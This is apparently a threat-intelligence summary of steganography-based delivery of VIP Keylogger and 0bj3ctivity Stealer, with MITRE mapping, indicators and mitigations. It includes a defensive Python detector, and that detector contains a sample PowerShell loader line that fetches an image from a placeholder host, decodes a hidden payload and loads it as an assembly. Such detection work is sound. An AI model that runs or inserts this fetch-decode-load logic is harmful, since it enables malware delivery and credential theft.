Full Report
Threat actors have been observed concealing malicious code in images to deliver malware such as VIP Keylogger and 0bj3ctivity Stealer as part of separate campaigns. "In both campaigns, attackers hid malicious code in images they uploaded to archive[.]org, a file-hosting website, and used the same .NET loader to install their final payloads," HP Wolf Security said in its Threat Insights Report
Analysis Summary
# Tool/Technique: VIP Keylogger and 0bj3ctivity Stealer via Image Steganography
## Overview
This analysis summarizes the deployment techniques used by threat actors to deliver two distinct malware payloads, **VIP Keylogger** and the **0bj3ctivity** stealer, by concealing malicious code within image files hosted on archive\[.\]org. The attack chain relies on initial phishing, exploitation of a known vulnerability, and the use of a shared .NET loader.
## Technical Details
- Type: Malware (Keylogger & Information Stealer) / Delivery Technique
- Platform: Windows (Inferred from VBScript/PowerShell execution and common office document exploitation)
- Capabilities: Data exfiltration (keystrokes, clipboard, screenshots, credentials), remote code execution via steganography/loader.
- First Seen: Q3 2024 (Based on HP Wolf Security Report timeframe)
## MITRE ATT&CK Mapping
The primary focus is on initial compromise, execution, and defense evasion via file manipulation.
- **TA0001 - Initial Access**
  - T1566 - Phishing
    - T1566.001 - Spearphishing Attachment (Using Excel documents disguised as invoices/POs)
- **TA0002 - Execution**
  - T1059 - Command and Scripting Interpreter
    - T1059.003 - Windows Command Shell (PowerShell execution)
  - T1204 - User Execution
    - T1204.002 - Malicious File
- **TA0005 - Defense Evasion**
  - T1027 - Obfuscated Files or Information (Base64 decoding, code hidden in images)
- **TA0011 - Command and Control**
  - T1071 - Application Layer Protocol (Implied C2 for payload delivery)

*(Note: specific technique IDs for the Equation Editor exploit (CVE-2017-11882) would fall under T1190 - Exploit Public-Facing Application or T1203 - Exploitation for Client Execution; the article presents the vulnerability exploitation as the initial step.)*
## Functionality
### Core Capabilities
- **Initial Infection Vector:** Phishing emails delivering malicious Microsoft Excel documents.
- **Exploitation:** Leveraging **CVE-2017-11882** (Equation Editor vulnerability) to download a VBScript file.
- **Loader Execution:** VBScript decodes and runs a PowerShell script.
- **Image Retrieval & Decoding:** PowerShell downloads an image (posted to archive\[.\]org), parses **Base64-encoded code** hidden within it, and decodes it into a .NET executable loader.
- **Payload Delivery:** The .NET loader downloads and executes either **VIP Keylogger** or **0bj3ctivity Stealer**.
### Advanced Features
- **Steganography/File Hiding:** Malicious payload fragments are hidden within innocuous image files, fetched remotely, significantly lowering the immediate visibility of the payload file itself.
- **Shared Loader:** Both campaigns appear to utilize the *same* .NET loader, suggesting the use of interchangeable malware kits.
- **VIP Keylogger Functions:** Steals keystrokes, clipboard content, screenshots, and credentials.
- **Alternative Entry Point:** One variant uses malicious archives containing a JavaScript file, which launches the PowerShell script instead of an Excel document exploiting CVE-2017-11882.
## Indicators of Compromise
The article primarily describes the *methodology* rather than listing specific artifacts for the final malware, focusing instead on the infrastructure used to host the steganographic images.
- File Hashes: [Not provided in the text]
- File Names: [Inferred: Malicious Microsoft Excel documents, VBScript files, PowerShell scripts, JavaScript files]
- Registry Keys: [Not provided in the text]
- Network Indicators:
  - Stage 1: Download source for VBScript/archive content (Implied sender domain/IP of phishing email).
  - Stage 2: Image hosted at: `archive[.]org` (Defanged)
  - Stage 3: Download URL for VIP Keylogger payload (Not specified).
- Behavioral Indicators:
  - Execution chain: Excel/JS -> VBScript -> PowerShell -> Image download -> .NET execution.
  - Use of `CVE-2017-11882` exploitation chain.
## Associated Threat Actors
- [Not explicitly named in the text, but they are described as leveraging sophisticated malware kits for efficiency.]
## Detection Methods
- Signature-based detection: Signatures required for the specific .NET loader, VIP Keylogger, and 0bj3ctivity Stealer binaries.
- Behavioral detection: Detection of unusual PowerShell execution retrieving remote files, especially scripts that parse image files for encoded content. Monitoring the exploitation attempts associated with Equation Editor (MS Office interaction leading to script execution).
- YARA rules: [Not provided in the text, but rules targeting the specific .NET loader assembly structure would be beneficial.]
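The two behavioral checks above can be prototyped without vendor tooling. The following is an added example written for this summary; it is not code from HP Wolf Security or from the campaigns described. It runs two defender-side checks on constructed input: first, it scans PowerShell script-block text (the kind of content that lands in Event ID 4104 logs) for the three links of the chain the report describes (remote image fetch, `FromBase64String`, reflective assembly load), flagging only when all three appear together; second, it scans raw image bytes for a long Base64 run that decodes to a PE file, which is what the described loader extraction would leave behind in the hosted image. The sample log lines, the `filehost.example` URL, the `<<BASE64_START>>`/`<<BASE64_END>>` markers and the stub PE bytes are all constructed for illustration and are not indicators from the report.

```python
import base64
import binascii
import re

# --- Check 1: script-block content matching the described delivery chain ---

# One regex per link of the chain: fetch an image from a remote host, carve
# Base64 text out of it, load the decoded bytes as a .NET assembly. Each link
# alone is noisy in normal administration; all three together is the signal.
CHAIN_PATTERNS = {
    "image_download": re.compile(
        r"(DownloadString|DownloadData|Invoke-WebRequest|iwr|curl)\b[^;]*?"
        r"\.(jpe?g|png|gif|bmp)\b", re.IGNORECASE),
    "base64_decode": re.compile(r"FromBase64String", re.IGNORECASE),
    "assembly_load": re.compile(r"Reflection\.Assembly\]::Load\b", re.IGNORECASE),
}

# Constructed sample script blocks (not real telemetry). The report names
# archive[.]org as the image host; a placeholder domain is used here instead.
SAMPLE_SCRIPT_BLOCKS = {
    "benign_listing": "Get-ChildItem C:\\Users\\alice\\Documents | Sort-Object Length",
    "benign_download": "Invoke-WebRequest https://intranet.example/report.pdf -OutFile report.pdf",
    "stego_loader": (
        "$img=(New-Object Net.WebClient).DownloadString('https://filehost.example/img/invoice.jpg');"
        "$s=$img.IndexOf('<<BASE64_START>>');$e=$img.IndexOf('<<BASE64_END>>');"
        "$bytes=[Convert]::FromBase64String($img.Substring($s+16,$e-$s-16));"
        "[Reflection.Assembly]::Load($bytes)"
    ),
}


def classify_script_block(text: str) -> dict:
    """Report which chain links a script block contains; 'flag' is True only when all are present."""
    hits = {name: bool(pat.search(text)) for name, pat in CHAIN_PATTERNS.items()}
    hits["flag"] = all(hits[name] for name in CHAIN_PATTERNS)
    return hits


def scan_script_blocks(blocks: dict) -> list:
    """Return the names of script blocks that match the full chain."""
    return [name for name, text in blocks.items() if classify_script_block(text)["flag"]]


# --- Check 2: image bytes carrying a Base64 run that decodes to a PE file ---

# A run of at least 64 Base64-alphabet bytes is rare inside genuine image data
# but is exactly what an embedded, text-encoded executable looks like.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{64,}={0,2}")


def _decode_run(run: bytes):
    # Tolerate a run that picked up trailing junk by retrying on a 4-aligned prefix.
    for candidate in (run, run[: len(run) - len(run) % 4]):
        try:
            return base64.b64decode(candidate, validate=True)
        except binascii.Error:
            continue
    return None


def find_embedded_executables(data: bytes) -> list:
    """Locate long Base64 runs in a file and report those that decode to an MZ/PE image."""
    findings = []
    for m in B64_RUN.finditer(data):
        decoded = _decode_run(m.group())
        if decoded is None or not decoded.startswith(b"MZ"):
            continue
        findings.append({
            "offset": m.start(),
            "b64_length": len(m.group()),
            "decoded_length": len(decoded),
            "has_pe_header": b"PE\x00\x00" in decoded,
        })
    return findings


# Constructed inputs: a stub with only the MZ/PE magic bytes (not a runnable
# program), wrapped in a minimal JPEG frame, and a clean JPEG frame for contrast.
FAKE_PE = b"MZ" + b"\x90" * 62 + b"PE\x00\x00" + b"\x00" * 40
JPEG_HEAD = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32
JPEG_TAIL = b"\xff\xd9"
STEGO_IMAGE = (JPEG_HEAD + b"<<BASE64_START>>" + base64.b64encode(FAKE_PE)
               + b"<<BASE64_END>>" + JPEG_TAIL)
CLEAN_IMAGE = JPEG_HEAD + JPEG_TAIL


if __name__ == "__main__":
    print("flagged script blocks:", scan_script_blocks(SAMPLE_SCRIPT_BLOCKS))
    print("stego image findings:", find_embedded_executables(STEGO_IMAGE))
    print("clean image findings:", find_embedded_executables(CLEAN_IMAGE))
```

Requiring all three links keeps the first check quiet on ordinary `Invoke-WebRequest` use; in production the same logic would read script-block text from the PowerShell operational log rather than the constructed dictionary, and the second check would run over files written by browsers or `WebClient` on the endpoint, or over objects a proxy pulls from image-hosting domains.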
## Mitigation Strategies
- Prevention measures: Implement multi-factor authentication (MFA) universally. Strictly enforce email filtering rules to block suspicious attachments (especially documents linking to script downloads).
- Hardening recommendations: Patching all systems against **CVE-2017-11882** (though this is an older MS Office vulnerability, ensuring patches are current is critical). Disable or restrict execution of scripts (VBScript, PowerShell) by non-administrative users or apply application control whitelisting.
## Related Tools/Techniques
- Snake Keylogger (Shares functional overlap with VIP Keylogger)
- 404 Keylogger (Shares functional overlap with VIP Keylogger)
- HTML Smuggling (Mentioned as another technique observed by the reporting vendor)
- Steganography (General technique used for file hiding)